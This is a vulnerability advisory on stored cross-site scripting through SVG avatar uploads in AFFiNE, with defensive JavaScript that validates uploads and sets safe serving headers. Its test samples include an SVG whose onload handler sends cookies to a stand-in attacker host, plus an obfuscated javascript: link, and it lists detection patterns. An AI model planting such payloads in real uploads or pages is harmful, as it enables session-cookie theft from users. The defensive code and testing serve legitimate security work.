toeverything AFFiNE Cross-Site Scripting Vulnerability in Avatar Upload Endpoint
Vulnerability
A stored cross-site scripting vulnerability has been identified in toeverything AFFiNE versions through 0.24.1. The issue arises in the Avatar Upload Image endpoint, which accepts SVG files without stripping or blocking the script an SVG can carry, so an attacker can upload an SVG containing obfuscated JavaScript. The file is stored permanently on the server and, because it is served back from the application's own origin, the script runs with that origin's privileges in the browser of any user who views the image. Note that script inside an SVG executes when the browser renders the file as a document (for example, by opening the stored file's URL directly or embedding it with an object or iframe element); it does not execute when the file is referenced only from an img element. A successful attack lets the script read the victim's cookies that are not flagged HttpOnly and send them to an arbitrary attacker-controlled endpoint.
Impact
Exploitation results in stored cross-site scripting: the uploaded image carries a script that runs in the browser of every user who views it. This can lead to cookie theft and to actions performed within the application on behalf of the victim.
Reproduction
To reproduce this vulnerability, upload an SVG file containing a JavaScript payload to the Avatar Upload Image endpoint. Once stored, the file is served back by the application, and opening it in a browser executes the payload in the context of the viewing user.
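The following is an added example, not AFFiNE's own code, showing how an avatar endpoint can (a) identify uploads by their bytes rather than the client-supplied content type, (b) refuse SVGs that carry active content, decoding numeric character references first so that entity-obfuscated payloads such as `&#106;avascript:` are not missed, and (c) serve any stored SVG with headers that stop a directly opened file from executing script in the site's origin. Function names, the header choices and the policy of refusing SVG by default are this example's own assumptions; the sample uploads are constructed for illustration and are not taken from any real report.

```javascript
// Added example, not AFFiNE's own code: server-side handling for an avatar
// upload endpoint. Function names and header choices are this example's own.

// Magic bytes for the raster formats an avatar endpoint normally needs.
const RASTER_MAGIC = [
  { type: 'image/png',  bytes: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { type: 'image/jpeg', bytes: [0xff, 0xd8, 0xff] },
  { type: 'image/gif',  bytes: [0x47, 0x49, 0x46, 0x38] },
  { type: 'image/webp', bytes: [0x52, 0x49, 0x46, 0x46] }, // "RIFF"; "WEBP" tag checked below
];

// Identify the image type from the bytes, ignoring the client-supplied Content-Type.
function sniffRasterType(buf) {
  for (const { type, bytes } of RASTER_MAGIC) {
    if (buf.length < bytes.length || !bytes.every((b, i) => buf[i] === b)) continue;
    if (type === 'image/webp' && buf.subarray(8, 12).toString('latin1') !== 'WEBP') continue;
    return type;
  }
  return null;
}

// True when the body is an SVG document: XML text whose root element is <svg>.
function looksLikeSvg(buf) {
  const head = buf.subarray(0, 2048).toString('utf8').replace(/^\uFEFF/, '');
  const body = head.replace(/<\?xml[\s\S]*?\?>|<!--[\s\S]*?-->|<!DOCTYPE[^>]*>/gi, '').trimStart();
  return /^<svg[\s>\/]/i.test(body);
}

// Decode numeric character references so "&#106;avascript:" reads as "javascript:".
function decodeNumericEntities(text) {
  const cp = (n, raw) => (n <= 0x10ffff ? String.fromCodePoint(n) : raw);
  return text
    .replace(/&#x([0-9a-f]+);?/gi, (m, h) => cp(parseInt(h, 16), m))
    .replace(/&#(\d+);?/g, (m, d) => cp(parseInt(d, 10), m));
}

// Defence-in-depth check for script-bearing SVG. A deny-list like this is
// brittle (XML offers many ways to hide script) and must not be the only
// control; the headers in avatarResponseHeaders are what actually stops execution.
function svgHasActiveContent(buf) {
  const text = decodeNumericEntities(buf.toString('utf8'));
  const patterns = [
    /<\s*script\b/i,                                                // <script> elements
    /\son[a-z]+\s*=/i,                                              // onload=, onclick=, ...
    /<\s*foreignObject\b/i,                                         // embeds arbitrary HTML
    /(?:href|src)\s*=\s*["']?\s*(?:javascript|data|vbscript)\s*:/i, // scriptable URLs
    /<\s*(?:use|image)\b[^>]*href\s*=\s*["']?\s*(?:https?:)?\/\//i, // external fetches
  ];
  return patterns.some((re) => re.test(text));
}

// Decide whether an upload may be stored and what type it is stored as.
// SVG is refused unless the deployment opts in; even then active content is rejected.
function validateAvatarUpload(buf, { allowSvg = false } = {}) {
  const raster = sniffRasterType(buf);
  if (raster) return { accept: true, storedType: raster };
  if (!looksLikeSvg(buf)) return { accept: false, reason: 'not a supported image' };
  if (!allowSvg) return { accept: false, reason: 'svg uploads disabled' };
  if (svgHasActiveContent(buf)) return { accept: false, reason: 'svg contains active content' };
  return { accept: true, storedType: 'image/svg+xml' };
}

// Response headers for a stored avatar. Content-Disposition: attachment makes a
// direct navigation download the file instead of rendering it, and the CSP
// sandbox blocks script if it is rendered anyway; <img> references still work.
function avatarResponseHeaders(storedType) {
  const headers = { 'Content-Type': storedType, 'X-Content-Type-Options': 'nosniff' };
  if (storedType === 'image/svg+xml') {
    headers['Content-Security-Policy'] = "sandbox; script-src 'none'";
    headers['Content-Disposition'] = 'attachment; filename="avatar.svg"';
  }
  return headers;
}

// Constructed sample uploads for this example (not taken from any real report).
const SAMPLE_PNG = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0, 0, 0, 13]);
const SAMPLE_EVIL_SVG = Buffer.from(
  '<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg" ' +
  'onload="fetch(\'https://attacker.example/?c=\'+document.cookie)"><rect/></svg>');
const SAMPLE_OBFUSCATED_SVG = Buffer.from(
  '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">' +
  '<a xlink:href="&#106;&#97;vascript:alert(1)"><text>hi</text></a></svg>');
const SAMPLE_CLEAN_SVG = Buffer.from(
  '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>');

for (const [name, buf] of Object.entries({ SAMPLE_PNG, SAMPLE_EVIL_SVG, SAMPLE_OBFUSCATED_SVG, SAMPLE_CLEAN_SVG })) {
  const verdict = validateAvatarUpload(buf, { allowSvg: true });
  console.log(name, verdict, verdict.accept ? avatarResponseHeaders(verdict.storedType) : '');
}
```

The simplest fix for an avatar feature is to reject SVG outright and accept only sniffed raster types, which is the default policy above. Where SVG must be kept, the pattern check alone is not sufficient; the serving headers are the control that removes the XSS, because a file that is downloaded rather than rendered, or rendered under a sandbox with no script, cannot run in the application's origin even if a payload slips past the filter.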
